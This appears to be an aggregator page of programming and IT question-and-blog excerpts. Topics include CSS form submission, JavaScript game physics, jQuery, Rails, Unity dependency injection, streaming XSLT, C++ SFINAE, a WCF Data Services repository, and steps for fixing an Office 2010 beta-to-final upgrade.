I'm working with a search box in the header of a responsive website. On desktop/tablet widths, there's a search input field and a styled 'search' button to the right. You can type in a search term and either click the 'SEARCH' button or just hit enter on the keyboard with the same result. When you scale down to mobile widths, the search input field fills the width of the screen. The submit button falls below it. On a desktop, clicking the button or hitting enter activates the search. On an actual iPhone, you can hit the 'SEARCH' button, but the native mobile keyboard that rises from the bottom of the screen has a search button where the enter/return key would normally be. It seems to know I'm in a form and the keyboard automatically gives me the option to kick off the search by basically hitting the ENTER key location....but it says SEARCH. So far so good. I figure I don't need the button in the header on mobile since it's already in the keyboard. Therefore, I'll hide the button on mobile widths and everything will be tighter and look better. So I added this to my CSS to hide it in mobile: #search-button {display: none;} But now the search doesn't work at all. On mobile, I don't get the option in the keyboard that showed up before and if I just hit enter, it doesn't work at all. On desktop at mobile width, hitting enter also no longer works. So clearly by hiding the submit/search button, the phone no longer gave me the native option to run the search. In addition, on the desktop at mobile width, even hitting enter inside the search input box also fails to launch the search. Here's my search box: <form id="search-form" method="get" accept-charset="UTF-8, utf-8" action="search.php"> <fieldset> <div id="search-wrapper"> <label id="search-label" for="search">Item:</label> <input id="search" class="placeholder-color" name="item" type="text" placeholder="Item Number or Description" /> <button id="search-button" title="Go" type="submit"><span class="search-icon"></span></button> </div> </fieldset> </form> Here's what my CSS looks like: #search-wrapper { float: left; display: inline-block; position: relative; white-space: nowrap; } #search-button { display: inline-block; cursor: pointer; vertical-align: top; height: 30px; width: 40px; } @media only screen and (max-width: 639px) { #search-wrapper { display: block; margin-bottom: 7px; } #search-button { /* this didn't work....it hid the button but the search failed to load */ display: none; } } So.....how can I hide this submit button when I'm on a mobile screen, but still let the search run from the mobile keyboard or just run by hitting enter when in the search input box? I was sure that putting display:none on the search button at mobile width would do the trick, but apparently not. Thanks...
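One workaround that is commonly suggested for this situation (a sketch, not verified on every device): leave the button in the form so the browser still has a submit control to trigger, and hide it visually rather than with display: none:

    @media only screen and (max-width: 639px) {
      /* visually hide the button but keep it in the form, so Enter and
         the keyboard's Search key can still trigger submission */
      #search-button {
        position: absolute;
        left: -9999px;
        width: 1px;
        height: 1px;
        overflow: hidden;
      }
    }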

    Read the article

• JavaScript physics in a 2D space

    - by eroo
    So, I am working on teaching myself Canvas (HTML5) and have most of a simple game engine coded up. It is a 2d representation of a space scene (planets, stars, celestial bodies, etc). My default "Sprite" class has a frame listener like such: "baseClass" contains a function that allows inheritance and applies "a" to "this.a". So, "var aTest = new Sprite({foo: 'bar'});" would make "aTest.foo = 'bar'". This is how I expose my objects to each other. { Sprite = baseClass.extend({ init: function(a){ baseClass.init(this, a); this.fields = new Array(); // list of fields of gravity one is in. Not sure if this is a good idea. this.addFL(function(tick){ // this will change to be independent of framerate soon. // and this is where I need help // gobjs is an array of all the Sprite objects in the "world". for(i = 0; i < gobjs.length; i++){ // Make sure its got setup correctly, make sure it -wants- gravity, and make sure it's not -this- sprite. if(typeof(gobjs[i].a) != undefined && !gobjs[i].a.ignoreGravity && gobjs[i].id != this.id){ // Check if it's within a certain range (obviously, gravity doesn't work this way... But I plan on having a large "space" area, // And I can't very well have all objects accounted for at all times, can I? if(this.distanceTo(gobjs[i]) < this.s.size*10 && gobjs[i].fields.indexOf(this.id) == -1){ gobjs[i].fields.push(this.id); } } } for(i = 0; i < this.fields.length; i++){ distance = this.distanceTo(gobjs[this.fields[i]]); angletosun = this.angleTo(gobjs[this.fields[i]])*(180/Math.PI); // .angleTo works very well, returning the angle in radians, which I convert to degrees here. // I have no idea what should happen here, although through trial and error (and attempting to read Maths papers on gravity (eeeeek!)), this sort of mimics gravity. // angle is its orientation, currently I assign a constant velocity to one of my objects, and leave the other static (it ignores gravity, but still emits it). this.a.angle = angletosun+(75+(distance*-1)/5); //todo: omg learn math if(this.distanceTo(gobjs[this.fields[i]]) > gobjs[this.fields[i]].a.size*10) this.fields.splice(i); // out of range, stop effecting. } }); } }); } Thanks in advance. The real trick is that one line: { this.a.angle = angletosun+(75+(distance*-1)/5); } This is more a physics question than Javascript, but I've searched and searched and read way to many wiki articles on orbital mathematics. It gets over my head very quickly. Edit: There is a weirdness with the SO formatting; forgives me, I is noobie.
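For comparison, here is a rough sketch of the usual approach: accumulate a per-frame acceleration from Newton's law (a = G*m/d^2) and integrate it into a velocity, instead of steering the angle directly. It assumes hypothetical x, y, vx, vy and mass properties on each Sprite, which the original code does not have:

    // Inside the frame listener, replacing the angle math (a sketch):
    var G = 0.5; // tuning constant for the game, not the real G
    for (var i = 0; i < this.fields.length; i++) {
      var body = gobjs[this.fields[i]];
      var dx = body.x - this.x;
      var dy = body.y - this.y;
      var distSq = dx * dx + dy * dy;
      if (distSq === 0) { continue; }        // same position: skip to avoid /0
      var dist = Math.sqrt(distSq);
      var accel = G * body.mass / distSq;    // Newton: a = G*m/d^2
      this.vx += (dx / dist) * accel;        // unit direction vector * magnitude
      this.vy += (dy / dist) * accel;
    }
    this.x += this.vx;                       // naive Euler integration
    this.y += this.vy;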

    Read the article

  • How to use jQuery to assign a class to only one radio button in a group when user clicks on it?

    - by xraminx
    I have the following markup. I would like to add class_A to <p class="subitem-text"> (that holds the radio button and the label) when user clicks on the <input> or <label>. If user clicks some other radio-button/label in the same group, I would like to add class_A to this radio-button's parent paragraph and remove class_A from any other paragraph that hold radio-buttons/labels in that group. Effectively, in each <li>, only one <p class="subitem-text"> should have class_A added to it. Is there a jQuery plug-in that does this? Or is there a simple trick that can do this? <ul> <li> <div class="myitem-wrapper" id="10"> <div class="myitem clearfix"> <span class="number">1</span> <div class="item-text">Some text here </div> </div> <p class="subitem-text"> <input type="radio" name="10" value="15" id="99"> <label for="99">First subitem </label> </p> <p class="subitem-text"> <input type="radio" name="10" value="77" id="21"> <label for="21">Second subitem</label> </p> </div> </li> <li> <div class="myitem-wrapper" id="11"> <div class="myitem clearfix"> <span class="number">2</span> <div class="item-text">Some other text here ... </div> </div> <p class="subitem-text"> <input type="radio" name="11" value="32" id="201"> <label for="201">First subitem ... </label> </p> <p class="subitem-text"> <input type="radio" name="11" value="68" id="205"> <label for="205">Second subitem ...</label> </p> <p class="subitem-text"> <input type="radio" name="11" value="160" id="206"> <label for="206">Third subitem ...</label> </p> </div> </li>
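No plug-in is needed; a short handler does it. Here is a sketch against the markup above (class_A taken literally as the class name); clicking a label fires the associated radio's change event, so one binding covers both:

    $('p.subitem-text input:radio').change(function () {
      var $p = $(this).closest('p.subitem-text');
      // clear the class from all subitem paragraphs in the same <li>,
      // then mark the paragraph owning the newly checked radio
      $p.closest('li').find('p.subitem-text').removeClass('class_A');
      $p.addClass('class_A');
    });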

    Read the article

  • Rails destroy confirm with Jquery AJAX

    - by Mike
    I have got this working for the most part. My rails link is: <%= link_to(image_tag('/images/bin.png', :alt => 'Remove'), @business, :class => 'delete', :confirm => 'Are you sure?', :id => 'trash') %> :class = "delete" is calling an ajax function so that it is deleted and the page isn't refreshed that works great. But because the page doesn't refresh, it is still there. So my id trash is calling this jquery function: $('[id^=trash]').click(function(){ var row = $(this).closest("tr").get(0); $(row).hide(); return false; }); Which is hiding the row of whatever trash icon i clicked on. This also works great. I thought I had it all worked out and then I hit this problem. When you click on my trash can I have this confirm box pop up to ask you if you are sure. Regardless of whether you choose cancel or accept, the jquery fires and it hides the row. It isn't deleted, only hidden till you refresh the page. I tried changing it so that the prompt is done through jquery, but then rails was deleteing the row regardless of what i choose in my prompt because the .destroy function was being called when the prompt was being called. My question really is how can i get the value to cancel or accept from the rails confirm pop up so that in my jquery I can have an if statement that hides if they click accept and does nothing if they click cancel. EDIT: Answering Question below. That did not work. I tried changing my link to: <%= link_to(image_tag('/images/bin.png', :alt => 'Remove'), @business, :class => "delete", :onclick => "trash") %> and putting this in my jquery function trash(){ if(confirm("Are you sure?")){ var row = $(this).closest("tr").get(0); $(row).hide(); return false; } else { //they clicked no. } } But the function was never called. It just deletes it with no prompt and doesn't hide it. But that gave me an idea. I took the delete function that ajax was calling $('a.delete').click (function(){ $.post(this.href, {_method:'delete'}, null, "script"); $(row).hide(); }); And modified it implementing your code: remove :confirm = 'Are you sure?' $('a.delete').click (function(){ if(confirm("Are you sure?")){ var row = $(this).closest("tr").get(0); $.post(this.href, {_method:'delete'}, null, "script"); $(row).hide(); return false; } else { //they clicked no. return false; } }); Which does the trick.

    Read the article

  • Applying Unity in dynamic menu

    - by Rajarshi
I was going through Unity 2.0 to check if it has an effective use in our new application. My application is a Windows Forms application and currently uses a traditional bar menu (at the top). My UIs (Windows Forms) more or less support the Dependency Injection pattern since they all work with a class (Presentation Model Class) supplied to them via the constructor. The form then binds to the properties of the supplied P Model class and calls methods on the P Model class to perform its duties. Pretty simple and straightforward. How the P Model reacts to the UI actions and responds to them by co-ordinating with the Domain Class (Business Logic/Model) is irrelevant here and thus not mentioned. The object creation sequence to show one UI from the menu then goes like this - Create Business Model instance Create Presentation Model instance with Business Model instance passed to P Model constructor. Create UI instance with Presentation Model instance passed to UI constructor. My present solution: To show a UI in the manner above from my menu, I would have to reference all assemblies (Business, PModel, UI) from my Menu class. Considering I have split the modules into a number of physical assemblies, it would be a difficult task to add references to about 60 different assemblies. Also the approach is not very scalable, since I will certainly need to release more modules, and with this approach I would have to change the source code every time I release a new module. So, primarily to avoid referencing so many assemblies from my Menu class (assembly), I did as below - Stored all the dependencies described above in a database table (SQL Server), e.g. ModuleShortCode | BModelAssembly | BModelFullTypeName | PModelAssembly | PModelFullTypeName | UIAssembly | UIFullTypeName Then used a static class named "Launcher" with a method "Launch" as below - Launcher.Launch("Discount") Launcher.Launch("Customers") The Launcher internally uses data from the dependency table and uses Activator.CreateInstance() to create each of the objects, using each instance as a constructor parameter for the next object being created, till the UI is built. The UI is then shown as a modal dialog. The code inside Launcher is somewhat like - Form frm = ResolveForm("Discount"); frm.ShowDialog(); The ResolveForm does the trick of building the chain of objects. Can Unity help me here? When I did that I did not have enough information on Unity, and now that I have studied Unity I think I have been doing more or less the same thing. So I tried to replace my code with Unity. However, as soon as I started I hit a block. If I try to resolve UI forms in my Menu as Form customers = myUnityContainer.Resolve<Customers>(); or Form customers = (Form)myUnityContainer.Resolve(typeof(Customers)); then either way I need to reference my UI assembly from my Menu assembly, since the target type "Customers" needs to be known for Unity to resolve it. So I am back to the same place, since I would have to reference all UI assemblies from the Menu assembly. I understand that with Unity I would have to reference fewer assemblies (only the UI assemblies), but those references are still needed, which defeats my objectives below - Create the chain of objects dynamically without any assembly reference from the Menu assembly. This is to avoid Menu source code changes every time I release a new module. My Menu is also built dynamically from a table. Be able to supply new modules just by supplying the new assemblies and inserting the new Dependency row in the table by a database patch.
At this stage, I have a feeling that I have to do it the way I was doing it, i.e. Activator.CreateInstance(), to fulfil all my objectives. I need to verify whether the community thinks the same way as me, or has a better suggestion to solve the problem. The post is really long and I sincerely thank you if you have come this far. Waiting for your valuable suggestions. Rajarshi
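For what it's worth, Unity can resolve types that are only known at run time if the table's strings are turned into Type objects first. Below is a sketch under that assumption (ModuleRow and LookupModule are hypothetical stand-ins for the dependency-table lookup), which keeps the Menu assembly free of compile-time references:

    using System;
    using System.Windows.Forms;
    using Microsoft.Practices.Unity;

    public static class UnityLauncher
    {
        public static Form ResolveForm(string moduleShortCode)
        {
            // hypothetical helper reading the dependency table shown earlier
            ModuleRow row = LookupModule(moduleShortCode);

            // load the type by name; no project reference to the 60 assemblies
            Type uiType = Type.GetType(row.UIFullTypeName + ", " + row.UIAssembly, true);

            IUnityContainer container = new UnityContainer();

            // Unity builds unregistered concrete types automatically, so
            // resolving the UI type walks the UI -> PModel -> BModel
            // constructor chain, provided each constructor asks for the
            // concrete next type in the chain.
            return (Form)container.Resolve(uiType);
        }
    }

If the constructors take base types rather than concrete ones, the table rows would have to be registered as type mappings first, which puts you back close to the Activator.CreateInstance() approach.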

    Read the article

  • Doing XML extracts with XSLT without having to read the whole DOM tree into memory?

    - by Thorbjørn Ravn Andersen
I have a situation where I want to extract some information from some very large but regular XML files (I just had to do it with a 500 Mb file), and where XSLT would be perfect. Unfortunately the XSLT implementations I am aware of (except the most expensive version of Saxon) do not support reading in only the necessary part of the DOM; they read in the whole tree. This causes the computer to swap to death. The XPath in question is //m/e[contains(.,'foobar')] so it is essentially just a grep. Is there an XSLT implementation which can do this? Or an XSLT implementation which, given suitable "advice", can do this trick of pruning away the parts in memory which will not be needed again? I'd prefer a Java implementation, but both Windows and Linux are viable native platforms. EDIT: The input XML looks like: <log> <!-- Fri Jun 26 12:09:27 CEST 2009 --> <e h='12:09:27,284' l='org.apache.catalina.session.ManagerBase' z='1246010967284' t='ContainerBackgroundProcessor[StandardEngine[Catalina]]' v='10000'> <m>Registering Catalina:type=Manager,path=/axsWHSweb-20090626,host=localhost</m></e> <e h='12:09:27,284' l='org.apache.catalina.session.ManagerBase' z='1246010967284' t='ContainerBackgroundProcessor[StandardEngine[Catalina]]' v='10000'> <m>Force random number initialization starting</m></e> <e h='12:09:27,284' l='org.apache.catalina.session.ManagerBase' z='1246010967284' t='ContainerBackgroundProcessor[StandardEngine[Catalina]]' v='10000'> <m>Getting message digest component for algorithm MD5</m></e> <e h='12:09:27,284' l='org.apache.catalina.session.ManagerBase' z='1246010967284' t='ContainerBackgroundProcessor[StandardEngine[Catalina]]' v='10000'> <m>Completed getting message digest component</m></e> <e h='12:09:27,284' l='org.apache.catalina.session.ManagerBase' z='1246010967284' t='ContainerBackgroundProcessor[StandardEngine[Catalina]]' v='10000'> <m>getDigest() 0</m></e> ...... </log> Essentially I want to select some m-nodes (and I know the XPath is wrong for that, it was just a quick hack), but maintain the XML layout. EDIT: It appears that STX may be what I am looking for (I can live with another transformation language), and that Joost is an implementation hereof. Any experiences? EDIT: I found that Saxon 6.5.4 with -Xmx1500m could load my XML, so this allowed me to use my XPaths right now. This is just a lucky stroke, so I'd still like to solve this generically - this means scriptable, which in turn means no handcrafted Java filtering first. EDIT: Oh, by the way. This is a log file very similar to what is generated by the log4j XMLLayout. The reason for XML is to be able to do exactly this, namely run queries on the log. This is the initial try, hence the simple question. Later I'd like to be able to ask more complex questions - therefore I'd like the query language to be able to handle the input file.
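Absent a streaming XSLT, the constant-memory version of this grep is straightforward with StAX, buffering one e element at a time. A Java sketch follows; admittedly this is exactly the handcrafted filtering the poster hoped to avoid, shown here as the baseline:

    import java.io.FileInputStream;
    import java.util.ArrayList;
    import java.util.List;
    import javax.xml.stream.XMLEventReader;
    import javax.xml.stream.XMLEventWriter;
    import javax.xml.stream.XMLInputFactory;
    import javax.xml.stream.XMLOutputFactory;
    import javax.xml.stream.events.XMLEvent;

    public class GrepLog {
        public static void main(String[] args) throws Exception {
            XMLEventReader reader = XMLInputFactory.newInstance()
                    .createXMLEventReader(new FileInputStream(args[0]));
            XMLEventWriter writer = XMLOutputFactory.newInstance()
                    .createXMLEventWriter(System.out);

            List<XMLEvent> buffer = new ArrayList<XMLEvent>();
            StringBuilder text = new StringBuilder();
            boolean inE = false;
            int depth = 0;

            while (reader.hasNext()) {
                XMLEvent ev = reader.nextEvent();
                if (!inE && ev.isStartElement()
                        && ev.asStartElement().getName().getLocalPart().equals("e")) {
                    inE = true;          // start buffering this <e> element
                    depth = 0;
                    buffer.clear();
                    text.setLength(0);
                }
                if (!inE) {
                    continue;            // skip everything outside <e> elements
                }
                buffer.add(ev);
                if (ev.isStartElement()) depth++;
                if (ev.isCharacters()) text.append(ev.asCharacters().getData());
                if (ev.isEndElement() && --depth == 0) {
                    inE = false;
                    if (text.indexOf("foobar") >= 0) {       // the actual "grep"
                        for (XMLEvent buffered : buffer) writer.add(buffered);
                    }
                }
            }
            // the output is an XML fragment (only the matching <e> elements);
            // wrap it in a root element if well-formed output is required
            writer.flush();
        }
    }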

    Read the article

  • Problem with incomplete type while trying to detect existence of a member function

    - by abir
I was trying to detect the existence of a member function for a class where the function uses an incomplete type. The typedef is struct foo; typedef std::allocator<foo> foo_alloc; The detection code is struct has_alloc { template<typename U, U x> struct dummy; template<typename U> static char check(dummy<void* (U::*)(std::size_t), &U::allocate>*); template<typename U> static char (&check(...))[2]; const static bool value = (sizeof(check<foo_alloc>(0)) == 1); }; So far I had been using the incomplete type foo with std::allocator without any error on VS2008. However, when I replaced it with a nearly identical implementation, template<typename T> struct allocator { T* allocate(std::size_t n) { return (T*)operator new (sizeof(T)*n); } }; it gives an error saying that, as T is an incomplete type, it has a problem instantiating allocator<foo>, because allocate uses sizeof. GCC 4.5 with std::allocator also gives the error, so it seems that during the detection process the class needs to be completely instantiated, even when I am not using that function at all. What I was looking for is void* allocate(std::size_t), which is different from T* allocate(std::size_t). My questions are (I have three questions, but as they are correlated I thought it better not to create three separate questions): Why doesn't the MS std::allocator check for the incomplete type foo while instantiating? Are they using any trick which can be implemented? Why does the compiler need to instantiate allocator<T> to check the existence of the function, when sizeof is not used as the SFINAE mechanism to remove/add allocate in the overload resolution set? It should be noted that if I remove the generic implementation of allocate, leaving only the declaration, and specialize it for foo afterwards, such as struct foo{}; template<> struct allocator<foo> { foo* allocate(std::size_t n) { return (foo*)operator new (sizeof(foo)*n); } }; after struct has_alloc, then it compiles in GCC 4.5 while VS2008 gives an error, as allocator<T> is already instantiated and the explicit specialization for allocator<foo> is already defined. Is it legal to use nested types of a std::allocator of incomplete type, such as typedef foo_alloc::pointer foo_pointer;? Though it is practically working for me, I suspect nested types such as pointer may depend on the completeness of the type they take. NOTE: As the code is not copy-pasted from an editor, it may have some syntax errors. I will correct them if I find any. Also, the code samples (such as allocator) are not complete implementations; I simplified and typed only the portion which I think is useful for this particular problem.

    Read the article

  • Implementing a generic repository for WCF data services

    - by cibrax
    The repository implementation I am going to discuss here is not exactly what someone would call repository in terms of DDD, but it is an abstraction layer that becomes handy at the moment of unit testing the code around this repository. In other words, you can easily create a mock to replace the real repository implementation. The WCF Data Services update for .NET 3.5 introduced a nice feature to support two way data bindings, which is very helpful for developing WPF or Silverlight based application but also for implementing the repository I am going to talk about. As part of this feature, the WCF Data Services Client library introduced a new collection DataServiceCollection<T> that implements INotifyPropertyChanged to notify the data context (DataServiceContext) about any change in the association links. This means that it is not longer necessary to manually set or remove the links in the data context when an item is added or removed from a collection. Before having this new collection, you basically used the following code to add a new item to a collection. Order order = new Order {   Name = "Foo" }; OrderItem item = new OrderItem {   Name = "bar",   UnitPrice = 10,   Qty = 1 }; var context = new OrderContext(); context.AddToOrders(order); context.AddToOrderItems(item); context.SetLink(item, "Order", order); context.SaveChanges(); Now, thanks to this new collection, everything is much simpler and similar to what you have in other ORMs like Entity Framework or L2S. Order order = new Order {   Name = "Foo" }; OrderItem item = new OrderItem {   Name = "bar",   UnitPrice = 10,   Qty = 1 }; order.Items.Add(item); var context = new OrderContext(); context.AddToOrders(order); context.SaveChanges(); In order to use this new feature, you first need to enable V2 in the data service, and then use some specific arguments in the datasvcutil tool (You can find more information about this new feature and how to use it in this post). DataSvcUtil /uri:"http://localhost:3655/MyDataService.svc/" /out:Reference.cs /dataservicecollection /version:2.0 Once you use those two arguments, the generated proxy classes will use DataServiceCollection<T> rather than a simple ObjectCollection<T>, which was the default collection in V1. There are some aspects that you need to know to use this feature correctly. 1. All the entities retrieved directly from the data context with a query track the changes and report those to the data context automatically. 2. A entity created with “new” does not track any change in the properties or associations. In order to enable change tracking in this entity, you need to do the following trick. public Order CreateOrder() {   var collection = new DataServiceCollection<Order>(this.context);   var order = new Order();   collection.Add(order);   return order; } You basically need to create a collection, and add the entity to that collection with the “Add” method to enable change tracking on that entity. 3. If you need to attach an existing entity (For example, if you created the entity with the “new” operator rather than retrieving it from the data context with a query) to a data context for tracking changes, you can use the “Load” method in the DataServiceCollection. var order = new Order {   Id = 1 }; var collection = new DataServiceCollection<Order>(this.context); collection.Load(order); In this case, the order with Id = 1 must exist on the data source exposed by the Data service. Otherwise, you will get an error because the entity did not exist. 
These cool extensions methods discussed by Stuart Leeks in this post to replace all the magic strings in the “Expand” operation with Expression Trees represent another feature I am going to use to implement this generic repository. Thanks to these extension methods, you could replace the following query with magic strings by a piece of code that only uses expressions. Magic strings, var customers = dataContext.Customers .Expand("Orders")         .Expand("Orders/Items") Expressions, var customers = dataContext.Customers .Expand(c => c.Orders.SubExpand(o => o.Items)) That query basically returns all the customers with their orders and order items. Ok, now that we have the automatic change tracking support and the expression support for explicitly loading entity associations, we are ready to create the repository. The interface for this repository looks like this,public interface IRepository { T Create<T>() where T : new(); void Update<T>(T entity); void Delete<T>(T entity); IQueryable<T> RetrieveAll<T>(params Expression<Func<T, object>>[] eagerProperties); IQueryable<T> Retrieve<T>(Expression<Func<T, bool>> predicate, params Expression<Func<T, object>>[] eagerProperties); void Attach<T>(T entity); void SaveChanges(); } The Retrieve and RetrieveAll methods are used to execute queries against the data service context. While both methods receive an array of expressions to load associations explicitly, only the Retrieve method receives a predicate representing the “where” clause. The following code represents the final implementation of this repository.public class DataServiceRepository: IRepository { ResourceRepositoryContext context; public DataServiceRepository() : this (new DataServiceContext()) { } public DataServiceRepository(DataServiceContext context) { this.context = context; } private static string ResolveEntitySet(Type type) { var entitySetAttribute = (EntitySetAttribute)type.GetCustomAttributes(typeof(EntitySetAttribute), true).FirstOrDefault(); if (entitySetAttribute != null) return entitySetAttribute.EntitySet; return null; } public T Create<T>() where T : new() { var collection = new DataServiceCollection<T>(this.context); var entity = new T(); collection.Add(entity); return entity; } public void Update<T>(T entity) { this.context.UpdateObject(entity); } public void Delete<T>(T entity) { this.context.DeleteObject(entity); } public void Attach<T>(T entity) { var collection = new DataServiceCollection<T>(this.context); collection.Load(entity); } public IQueryable<T> Retrieve<T>(Expression<Func<T, bool>> predicate, params Expression<Func<T, object>>[] eagerProperties) { var entitySet = ResolveEntitySet(typeof(T)); var query = context.CreateQuery<T>(entitySet); foreach (var e in eagerProperties) { query = query.Expand(e); } return query.Where(predicate); } public IQueryable<T> RetrieveAll<T>(params Expression<Func<T, object>>[] eagerProperties) { var entitySet = ResolveEntitySet(typeof(T)); var query = context.CreateQuery<T>(entitySet); foreach (var e in eagerProperties) { query = query.Expand(e); } return query; } public void SaveChanges() { this.context.SaveChanges(SaveChangesOptions.Batch); } } For instance, you can use the following code to retrieve customers with First name equal to “John”, and all their orders in a single call. repository.Retrieve<Customer>(    c => c.FirstName == “John”, //Where    c => c.Orders.SubExpand(o => o.Items)); In case, you want to have some pre-defined queries that you are going to use across several places, you can put them in an specific class. 
public static class CustomerQueries {   public static Expression<Func<Customer, bool>> LastNameEqualsTo(string lastName)   {     return c => c.LastName == lastName;   } } And then, use it with the repository. repository.Retrieve<Customer>(    CustomerQueries.LastNameEqualsTo("foo"),    c => c.Orders.SubExpand(o => o.Items));
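As the opening paragraph notes, the point of the abstraction is testability. Here is a minimal hand-rolled fake (a sketch; a mocking framework would do equally well) that satisfies IRepository with an in-memory list:

    using System;
    using System.Collections.Generic;
    using System.Linq;
    using System.Linq.Expressions;

    public class FakeRepository : IRepository
    {
        private readonly List<object> store = new List<object>();

        public T Create<T>() where T : new()
        {
            var entity = new T();
            store.Add(entity);
            return entity;
        }

        public void Update<T>(T entity) { /* nothing to track in-memory */ }
        public void Delete<T>(T entity) { store.Remove(entity); }
        public void Attach<T>(T entity) { store.Add(entity); }

        // The eager-loading expressions are ignored: an in-memory object
        // graph is already "loaded", which keeps tests simple.
        public IQueryable<T> RetrieveAll<T>(
            params Expression<Func<T, object>>[] eagerProperties)
        {
            return store.OfType<T>().AsQueryable();
        }

        public IQueryable<T> Retrieve<T>(Expression<Func<T, bool>> predicate,
            params Expression<Func<T, object>>[] eagerProperties)
        {
            return store.OfType<T>().AsQueryable().Where(predicate);
        }

        public void SaveChanges() { /* no-op for tests */ }
    }

Code under test that depends only on IRepository can then be exercised against FakeRepository without a data service on the other end.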

    Read the article

  • Fix Problems Upgrading Office 2010 Beta to RTM (Final) Release

    - by Mysticgeek
    There are several scenarios where you may run into trouble uninstalling the 2010 Beta and trying to install the RTM (final) release. Today we’ll cover the problems we ran into, and how to fix them. You would think upgrading from the Office 2010 Beta to the final release would be an easy process. Unfortunately, it’s not always that simple. In fact, we ran into three different scenarios where the install wasn’t smooth whatsoever. If you currently have the 2010 Beta installed, you have to remove it before you can install the RTM.  Here we’ll take a look at three different troublesome install scenarios we ran into, and how we fixed each one. Important Note: Before proceeding with any of these steps, make sure and backup your Outlook .pst files! Scenario 1 – Uninstall Office 2010 Beta & Fix Install Errors In this first scenario we have Office Professional Plus 2010 Beta 32-bit installed on a Windows 7 Home Premium 32-bit system. First try to uninstall the Office 2010 Beta by going into Control Panel and selecting Programs and Features. Scroll down to Microsoft Office Professional Plus 2010, right-click it and select Uninstall. Click Yes when the confirmation dialog box comes up. Wait while Office 2010 Beta uninstalls…the amount of time it takes will vary from system to system. To complete the uninstall process, a reboot is required. Fixing Setup Errors The problem is when you start the installation of the 2010 RTM… You get the following setup error even though you uninstalled the 2010 Beta. The problem is there are leftover Office apps or stand alone Office products. So, we need a utility that will clean them up for us.   Windows Installer Clean Up Utility Download and install the Clean Up Utility (link Below) following the defaults. After it’s installed you’ll find it in Start \ All Programs \ Windows Install Clean Up …go ahead and launch the utility. Now go through and remove all Office Programs or addins that you find in the list. Make sure you are just deleting Office apps and not something you need like Java for example. If you’re not sure what something is, doing a quick Google search should help you out. For instance we had the Office labs Ribbon Hero installed… just highlight and click Remove. Remove anything that has something to do with Office…then reboot your machine. Now, you should be able to begin the installation of Office 2010 RTM (Final) Release without any errors. If you do get an error during the install process, like this one telling us we have old version of Groove Server… Navigate to C:\Users\username\AppData\Local\Microsoft (where username is the computer name) and delete any existing MS Office folders. Then try the install again, this solved the problem in our first scenario. Scenario 2 – Not Being Able to Uninstall 2010 Beta from Programs and Features In this next scenario we have Office Professional Plus 2010 Beta 32-bit installed on a Windows 7 Home Premium 32-bit system. Another problem we ran into is not being able to uninstall the 2010 Beta from Programs and Features. When you go in to uninstall it, nothing happens. If you run into this problem, we again need to download and install the Windows Installer Clean Up Utility (link below) and manually uninstall the Beta. When you launch it, scroll down to Microsoft Office Professional Plus 2010 (Beta), highlight it and click Remove.   
Click OK to the Warning Dialog box… If you see any other Office 2010, 2007, or 2003 entries you can hold the “Shift” key and highlight them all…then click Remove and click OK to the warning dialog. Now we need to delete some Registry settings. Click on Start and type regedit into the Search box and hit Enter. Navigate to HKEY_CURRENT_USER \ Software \ Microsoft \ Office and delete the folder. Then navigate to HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Office and delete those keys as well. Now go into C:\Program Files and find any of these three folders…Microsoft Office, OfficeUpdate, or OfficeUpdate14…you might find one, two or all three. Either way just rename the folders with “_OLD” (without quotes) at the end. Then go into C:\Users\username\AppData\Local\Microsoft and delete any existing MS Office folders. Where in this example we have office, Office Labs, One Note…etc. Now we want to delete the contents of the Temp folder. Click on Start and type %temp% into the Search box and hit Enter. Use the key combination “Ctrl+A” to select all the files in this folder, then right-click and click Delete, or simply hit the Delete key. If you have some files that won’t delete, just skip them as they shouldn’t affect the Office install. Then empty the Recycle Bin and restart your machine. When you get back from the restart launch the Office 2010 RTM installer and you should be good to go with installation. Because we uninstalled the Office 2010 Beta manually, you may have some lingering blank icons that you’ll need to clean up. Scenario –3 Uninstall 2007 and Install 2010 32-Bit on x64 Windows 7 For this final scenario we are uninstalling Office Professional 2007 and installing Office Professional Plus 2010 32-Bit edition on a Windows Ultimate 64-bit computer. This machine actually had Office 2010 Beta 64-bit installed at one point also, it’s since been removed, and 2007 was reinstalled.  Go into Programs and Settings and uninstall Microsoft Office Professional 2007. Click Yes to the dialog box asking if you’re sure you want to uninstall it… Then wait while Office 2007 is uninstalled. The amount of time it takes will vary between systems. A restart is required to complete the process… Again we need to call upon the Windows Installer Clean Up Utility. Go through and delete any left over Office 2007 and 2010 entries. Click OK to the warning dialog that comes up. After that’s complete, navigate to HKEY_CURRENT_USER \ Software \ Microsoft \ Office and delete the folder. Then navigate to HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Office and delete those keys as well. We still need to go into C:\Users\ username\AppData\ Local\ Microsoft (where username is the computer name) and delete any Office folders. In this example we have Outlook Connector, Office, and Outlook to delete. Now let’s delete the contents of the Temp folder by typing %temp% into the Search box in the Start Menu. Then delete all of the files and folders in the Temp directory. If you have some files that won’t delete, just skip them as they shouldn’t affect the Office install. Then empty the Recycle Bin and restart your machine. If you try to install the 2010 RTM at this point you might be able to begin the install, but may get the following Error 1402 message. To solve this issue, we opened the command prompt and ran the following: secedit /configure /cfg %windir%\inf\defltbase.inf /db defltbase.sdb /verbose After the command completes, kick off the Office 2010 (Final) RTM 32-bit edition. 
This solved the issue and Office 2010 installed successfully. Conclusion Except for the final scenario, we found using the Windows Installer Clean Up Utility to come in very handy. Using that along with deleting a couple folders and registry settings did the trick. In the last one, we had to get a bit more geeky and use some command line magic, but it got the job done. After some extensive testing in our labs, the only time the upgrade to the RTM went smoothly was when we had a clean Vista or Windows 7 system with a fresh install of the 2010 beta only. However, chances are you went from 2003 or 2007 to the free 2010 Beta. You might also have addins or other Office products installed, so there are going to be a lot of different office files scattered throughout your PC. If that's the case, you may run into the issues we covered here. These are a few scenarios where we got errors and were not able to install Office 2010 after removing the beta. There could be other problems, and if any of you have experienced different issues or have more good suggestions, leave a comment and let us know! Link: Download Windows Installer Clean Up Utility

    Read the article

  • Quotas - Using quotas on ZFSSA shares and projects and users

    - by Steve Tunstall
